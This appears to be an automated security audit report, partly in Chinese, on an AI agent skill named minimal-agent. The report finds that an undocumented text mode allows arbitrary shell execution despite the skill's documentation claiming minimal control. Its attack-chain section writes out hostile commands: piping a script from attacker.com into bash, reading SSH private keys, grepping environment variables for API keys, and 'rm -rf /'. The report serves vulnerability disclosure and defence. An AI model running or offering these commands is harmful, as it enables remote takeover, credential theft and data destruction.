安全决策报告
minimal-agent
Skill declares minimal OS control capabilities but secretly implements unrestricted arbitrary command execution through undocumented V1/text mode, enabling full system compromise.
最直接的威胁证据
严重 代码执行
Unrestricted Arbitrary Command Execution via V1 Mode The skill implements a 'V1/text mode' that allows execution of ANY shell command, but this is not declared in allowed-tools. The documentation only mentions 'minimal OS control' with controlled hardware operations, yet the actual code exposes unlimited command execution.
scripts/agent.py:459 为什么得出这个结论
2/4 个维度触发 阻止
声明与实际能力
发现 4 项声明之外的能力或越权行为。
复核
隐藏执行与外联
提取到 3 个一般风险产物,需要结合上下文判断。
阻止
攻击链与高危发现
报告包含 7 步攻击链,另有 4 项高危或严重发现。
通过
依赖与供应链卫生
依赖结构存在,但暂未看到明显高危告警。
攻击链
01
Skill marketed as minimal OS control agent with window management and hardware control
deception · SKILL.md:1
02
V1/text mode documented as 'development/debugging' feature without emphasizing unrestricted command execution
deception · SKILL.md:65
03
Attacker forces V1 mode via --text flag or config mode='force_text'
access · scripts/agent.py:444
04
execute_raw_command() passes arbitrary input to shell=True subprocess
代码执行 · scripts/agent.py:459
05
Attacker executes: 'curl https://attacker.com/shell.sh | bash' for reverse shell
最终危害 · scripts/agent.py:459
06
Attacker executes: 'cat ~/.ssh/id_rsa' to steal SSH keys
最终危害 · scripts/agent.py:459
07
Attacker executes: 'env | grep API' to harvest credentials
最终危害 · scripts/agent.py:459
风险分是怎么被拉高的
Undeclared arbitrary command execution +35
V1/text mode enables ANY shell command not declared in allowed-tools
Doc-to-code capability mismatch +20
Documentation claims minimal OS control but actual code allows full system access
shell=True subprocess execution +15
execute_raw_command() passes user input directly to shell=True
No parameter validation +5
Command parameters passed directly without sanitization
最关键的证据
严重 代码执行
Unrestricted Arbitrary Command Execution via V1 Mode
The skill implements a 'V1/text mode' that allows execution of ANY shell command, but this is not declared in allowed-tools. The documentation only mentions 'minimal OS control' with controlled hardware operations, yet the actual code exposes unlimited command execution.
scripts/agent.py:459 Remove V1/text mode entirely or declare it explicitly in allowed-tools with shell:ADMIN level. The function-calling V2 mode with 55 predefined tools should be the only permitted execution path.
严重 文档欺骗
Documentation Mismatch: Claims Minimal Control But Enables Full System Access
SKILL.md describes this as a '极简 AI 操作系统控制代理' (minimal AI OS control agent) for window management, process control, hardware operations, GUI automation, serial communication, and IoT control. However, the V1 mode documented in SKILL.md enables unrestricted command execution including: file operations, script execution, network operations, database operations, system management, software installation, and security operations.
SKILL.md:67 Either remove V1 mode entirely or prominently document that this skill can execute arbitrary system commands with full system access.
高危 代码执行
Direct Shell Injection via User Input
The execute_raw_command() function passes user input directly to shell=True without any sanitization or validation. Commands like 'python agent.py --text "rm -rf /"' would execute immediately.
scripts/agent.py:459 Implement strict input validation and allowlisting. If arbitrary command execution is truly needed, use shell=False with explicit command/argument separation.
高危 权限提升
Undeclared Elevated Permissions
The skill declares filesystem:WRITE and shell:WRITE, but V1 mode actually provides filesystem:ADMIN and shell:ADMIN equivalent capabilities, enabling: user management, service control, registry editing, firewall configuration, software installation/removal.
SKILL.md:87 Declare the actual permission level (ADMIN) for filesystem and shell resources, or remove these dangerous capabilities.
中危 代码混淆
Python venv Path Hardcoded with User Home Directory
Line 114 hardcodes 'C:\Users\wave\.workbuddy\binaries\python\envs\default\Scripts\python.exe' which could be leveraged for persistence or DLL hijacking attacks.
scripts/agent.py:114 Use relative paths or configurable paths instead of hardcoding absolute paths to user directories.
中危 凭证窃取
Potential Environment Variable Access for API Keys
V1 mode can execute commands like 'env' or 'printenv' to extract API keys, tokens, and other secrets from environment variables. This is not declared in allowed-tools.
scripts/agent.py:459 If environment variable access is needed, explicitly declare it and implement safeguards against exfiltration.
声明能力 vs 实际能力
命令执行 通过
声明 WRITE
→ 推断 WRITE
agent.py:run_script() uses subprocess 文件系统 通过
声明 WRITE
→ 推断 WRITE
agent.py + V1 mode enables any file operation 网络访问 阻止
声明 READ
→ 推断 READ_WRITE
— 数据库 阻止
声明 NONE
→ 推断 WRITE
— 环境变量 阻止
声明 NONE
→ 推断 READ
— 技能调用 阻止
声明 NONE
→ 推断 WRITE
— 可疑产物与外联
中危 外部 URL
https://skillhub.tencent.com/skills/system-controller SKILL.md:262
中危 外部 URL
https://clawhub.ai/wangjiaocheng/system-controller SKILL.md:271
中危 外部 URL
https://clawhub.ai/wangjiaocheng/system-controller/archive/main.zip SKILL.md:275
依赖与供应链
| 包名 | 版本 | 来源 | 漏洞 | 备注 |
|---|---|---|---|---|
| subprocess | stdlib | Python | 否 | Standard library only |
| tomllib | stdlib | Python | 否 | Standard library only |
文件构成
3 个文件 · 1255 行
Python 1 个文件 · 938 行Markdown 1 个文件 · 293 行TOML 1 个文件 · 24 行
需关注文件 · 2
scripts/agent.py Unrestricted Arbitrary Command Execution via V1 Mode · Direct Shell Injection via User Input · Python venv Path Hardcoded with User Home Directory · Potential Environment Variable Access for API Keys
SKILL.md Documentation Mismatch: Claims Minimal Control But Enables Full System Access · Undeclared Elevated Permissions · https://skillhub.tencent.com/skills/system-controller · https://clawhub.ai/wangjiaocheng/system-controller · https://clawhub.ai/wangjiaocheng/system-controller/archive/main.zip
其他文件 · config.toml
安全亮点
V2/function-calling mode provides controlled execution with 55 predefined tools
Dangerous operations (power_shutdown, process_kill, network_disable) have confirmation prompts in V2 mode
Configuration allows disabling auto mode fallback to V1
Timeout limits (30s) prevent indefinite command execution